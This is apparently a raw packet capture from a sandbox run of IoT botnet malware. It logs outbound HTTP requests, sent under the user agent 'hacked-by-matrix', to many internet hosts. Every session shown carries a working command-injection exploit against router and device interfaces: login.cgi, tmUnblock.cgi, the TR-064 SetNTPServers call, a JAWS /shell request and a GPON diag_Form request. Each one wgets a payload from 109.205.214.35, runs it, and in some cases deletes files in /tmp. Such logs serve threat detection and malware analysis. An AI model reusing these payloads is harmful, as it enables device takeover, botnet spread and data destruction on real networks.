                                                        Mar 21, 2024 05:22:37.360249043 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:38.767354965 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:38.977770090 CET318INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Server: inity-dev-server
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        558192.168.2.1351102212.103.126.1858080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:36.350898981 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:36.579791069 CET289INHTTP/1.1 404 Not Found
                                                        CONNECTION: close
                                                        CONTENT-LENGTH: 48
                                                        X-XSS-Protection: 1;mode=block
                                                        Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                        X-Content-Type-Options: nosniff
                                                        CONTENT-TYPE: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><body><h1>404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        559192.168.2.1359220114.27.202.17380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:36.381467104 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        560192.168.2.1342546184.73.155.1058080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:36.748521090 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:37.261490107 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        561192.168.2.1360124212.83.183.3480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:36.884073019 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:37.396519899 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:37.564316034 CET495INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:37 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 301
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        562192.168.2.135688837.37.170.727547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:36.921708107 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:41.068429947 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:47.212241888 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:59.244337082 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:24.588234901 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        563192.168.2.1358648138.100.213.14680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:37.690557003 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        564192.168.2.134294680.156.90.9980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:37.693451881 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:38.605525970 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        565192.168.2.134145018.238.74.17380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:37.802187920 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:37.890070915 CET927INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        566192.168.2.1358684172.64.50.1608080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:37.860565901 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        567192.168.2.1348354172.65.245.2058080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:37.861916065 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        568192.168.2.135220664.14.122.3080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:37.897125959 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:38.413316965 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:39.023317099 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:40.239296913 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:42.861357927 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:47.724256992 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:57.457321882 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:18.444236040 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        569192.168.2.1336210156.224.236.20680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.037559032 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        570192.168.2.1354892154.91.191.20480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.350033045 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:38.661319017 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        571192.168.2.135506834.223.231.11480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.373354912 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:38.560012102 CET146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        572192.168.2.1342922212.226.15.252443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.587861061 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        573192.168.2.134973442.153.44.28443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.587893963 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        574192.168.2.1333718212.76.52.51443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.587918043 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        575192.168.2.136048642.38.127.90443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.587918043 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        576192.168.2.13466525.169.32.178443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.587949991 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        577192.168.2.1351946109.105.0.255443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:38.587976933 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
